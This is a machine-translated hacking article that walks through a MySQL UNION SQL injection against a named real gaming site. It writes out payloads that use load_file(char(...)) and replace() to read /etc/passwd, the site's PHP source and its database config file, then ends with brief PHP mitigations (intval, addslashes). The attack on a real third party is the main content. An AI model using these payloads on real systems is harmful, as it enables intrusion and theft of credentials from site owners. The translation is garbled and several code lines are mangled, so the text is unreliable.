Author: cnbird Source: http: //www.juntuan.net/ Thank Corps has given me such a good environment, allow me to write some original articles cause: Listen promised CASI out of 2.0, and it promises I also gave an address with a vulnerability. I didn't test it. I was very depressed recently. I couldn't learn, just promised to have a good time I learned PHP, see if I still can't do this. Process. Process : The address of the promise is http://www.gametea.com/showboard.php?id=282 Standard PHP Injection Form, we also inject according to the standard PHP injection method, first add one again, http://www.gametea.com/showboard.php?id=282 'As Figure 1 He tells us 2 aspects, the first is Magic_QUOTES_GPC = Off Second is the web path /Home/newgt/showboard.php By submitting the statement, we will first explain the principles of PHP injection and a small example. PHP injection is to use the variable filtering insufficient to see the following two SQL statements:
1Select * from article where articleid = '$ ID' 2select * from article where articleid = $ ID The two ways are common in various programs, but the security is different, the first sentence is in one by one In single quotes, the variables we submit becomes a string, even if the correct SQL statement is included, it will not perform properly, and the second sentence is different, because the variable is not placed in single quotes, then Everything we have submitted, as long as it contains spaces, the variables after the space will be executed as a SQL statement, and we submit two successful implanted malformation statements for the two sentences to see different.
1 Specify variable $ ID to: 1 'and 1 = 2 Union Select * from user where userid = 1 / * At this time, the entire SQL statement becomes: select * from article where articleid =' 1 'and 1 = 2 Union Select * from User where userid = 1 / * '2 Specify variable $ ID to: 1 and 1 = 2 Union Select * from user where userid = 1 At this time, the entire SQL statement becomes: select * from article where articleid = 1 and 1 = 2 Union SELECT * exe User where userid = 1 See it? Since the first sentence has a single quotes, we must first close the previous single quotes, so that the latter statements are executed as SQL, and to comment out the back of the single quotes in the back SQL statement so that it can be successfully injected if PHP .ini Magic_QUOTES_GPC is set to ON or a variable using the addslashes () function, our attack will become a black, but the second sentence does not use quotation to include variables, then we don't have to consider closing, annotation, direct submission is OK . Ok, now we have to submit a statement in accordance with Angel's method http://www.gametea.com/showboard.php?id=282 and 1=2 Union Select 50, 9, 8, 7, 6, 5, 4, 3, 2, 1, then here we can learn that the two places of 7 and 9 are text, that is, the content of the file we want, let's read it. The file on the server is from the web path. This machine should be UNIX. Then our goal is to get / etc / passwd this file. We know, in the SQL statement, you can use a variety of mysql built-in functions, often Used is Database (), user (), system_user (), session_user (), current_user () these functions to get some system information, and an application is more function, which is load_file (), the function of this function It is a read file and returns the file content as a string. Seeing this, you should think of what we can do, just read some confidential documents, but it is also conditional restrictions:
To read the file must specify the full path of the file on the server must have permission to read and the file must read with the file must be smaller than max_allowed_packet if the file does not exist, or because of any of the above reasons cannot be read The function returns to empty. More difficult is permission, under Windows, if the NTFS is set properly, you cannot read the relevant file, when you encounter the file that only Administrators can access, users don't want to go out. In actual injection, we have two difficulties to solve:
Absolute physical path construction effective malformed statement in many PHP programs, when submitting a wrong Query, if Display_errors = ON, the program exposes the absolute path of the web directory, as long as the path is known, then for an injected PHP program The security of the entire server will be seriously threatened. The constructing statement is already small. We use the load_file (char ()) This function we need to convert the / etc / passwd to 16-based, please ask the ASC2chr tool to help us complete the transformation work. The PASSWD's 16-encyclopedic format is the build statement _file (CHAR (47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)), 6, 5, 4, 3, 2, 1 "Rel =" Nofollow "> http: // www. Gametea.com/showboard.php?id=282 and 1=2 Union Select 50, 9, 8, or 6, 116, 99, 47, 112, 97, 115, 115, 119, 100), 6, 5, 4, 3, 2, 1 Easy to get the / etc / passwd file, let's take a look at the picture, as shown in Figure 4
Here we find a way to read the config configuration file, because we got in front of the web path so it is easier to build the statement read _file (char (47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)) , 6, 5, 4, 3, 2, 1 "Rel =" Nofollow "> http://www.gametea.com//showboard.php?id=282 and 1=2 Union Select 50, 9, 8, LOAD_FILE (CHAR (47, 104, 111, 109, 101, 47, 110, 101, 119, 103, 116, 47, 115, 104, 111, 119, 98, 111, 104, 112)), 6, 5, 4, 3, 2, 1 as shown in Figure 5
However, it is different from what we think, and didn't get a PHP source code. It turns out that the PHP code re-server is executed. At this time we can use the angel's way to use Into Outfile to back up the file to be read to the server, but I Didn't do this, because I don't want to be limited to someone else, I think mysql must have a strong function to help us. I remember that when I learned the character string function before learning the string function, I learned such a function is replacing () his role is Replace the specified string to the string we want, I think it can be used, with a replace () function original REPLACE (Str, from_str, to_str) Returns the string STR, and the string from-STR has all occurred String to-Str replace MySQL> SELECT Replace ('www.mysql.com', 'W', 'WW'); -> 'wwwwww.mysql.com' to here I want to have a fixed form of PHP source code is In this case, So if we break the rules, turn the To other characters, then you should be able to display, according to this idea, I am enough to the following _file (47, 104, 111, 109, 101) 47, 110, 101, 119, 103, 116, 47, 115, 104, 111, 119, 98, 111, 97, 114, 100, 46, 112, 104, 112)), CHAR (60), CHAR (32)), 6, 5, 4, 3, 2, 1 "Rel =" Nofollow "> http: //www.gametea.. com // showboard.php? id = 282% 20and% 201 = 2% 20union% 20select% 2050,9,8, replace (load_file (char (47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)), char (60 ), CHAR (32)), 6, 5, 4, 3, 2, 1 CHAR (60) is <, char (32) is a space, he means that it has been replaced with space, we have succeeded, everyone looks As shown in Figure 6, it's a good purpose to read the config files. His config file is /Home/newgt/localdata.php, enough to include the following _file (47, 104, 111, 109, 101, 47, 110, 101 ,11 9, 103, 116, 47, 108, 111, 99, 97, 108, 112, 116, 97, 46, 112, 104, 112)), CHAR (60), CHAR (32)), 6, 5, 4, 3, 2, 1 "Rel =" Nofollow "> http: // www .gametea.com / showboard.php? id = 282% 20and% 201 = 2% 20union% 20select% 2050,9,8, replace (load_file (char (47,104,111,109,101,47,110,101,119,103,116,47,108,111,99,97,108,100,97,116,97,46,112,104,112 )), char (60), char (32)), 6, 5, 4, 3, 2, 1. We have already got converted with config, as shown in Figure 7
Here, our ideas should be clear, I will not do it down. If you are interested, you can refer to my previous article to continue to penetrate. Here we can clearly see a small injection vulnerability. Such a big vulnerability, I hope that the people in China will pay attention to the solution to prevent it from two aspects, one is the server, the two is the code itself, the article introduces the server configuration, it is nothing more than setting Magic_QUOTES_GPC to ON, Display_errors is set to OFF, which is not much more, since this paper is a problem, we are still looking for reasons from the program itself. If PHP is easy to use, safe, safe, from the built-in function, can be embodied. If it is a shaped variable, just use an intVal () function to resolve the problem, before performing the query, we will handle the variable first, as follows: $ ID = intVal ($ ID); mysql_Query ("SELECT * from article where articleid = '$ ID'"); or write:
MySQL_QUERY ("Select * from article where article (" SELECT * ARTICLE WHERE ARTICLEID = ". INTVAL ($ ID)." ") No matter how it constructs, it will eventually be converted to a shaping guess to put into the database. Many large programs are written like this, very simple. The string variable can also be used with the addslashes () entire built-in function. Like magic_quotes_gpc, after use, all '(single quotes), "(double quotes), / (reverse slope) and empty characters It will automatically be turned into an overflow character containing a backslash. Even if Magic_QUOTES_GPC is opened, it will use the addslashes () function, and there will be no conflict, you can use it. Examples are as follows:
$ usrname = addslashes ($ usrname); mysql_query ("Select * from membrate where userid = '$ usrname'); or write:
MySQL_QUERY ("Select * from member userid =". AddSlashes ($ username). ") Use the addslashes () function to avoid quotation marking errors. The repair method of the previous search engine is to convert "_" and "%" directly to "/ _" "/%", and of course don't forget to use the addslashes () function. The specific code is as follows:
$ keywords = addslashes ($ keywords); $ keywords = str_replace ("_", "/ _", $ keywords); $ keywords = str_replace ("%", "/%", $ keywords); ok, this article Article Write here Reference: SQL Injection with MySqlhttp://www.4ngel.net/Article/36.htmadvanced SQL Injection with MySQLHTTP: //www.4ngel.net/Article/30.htm
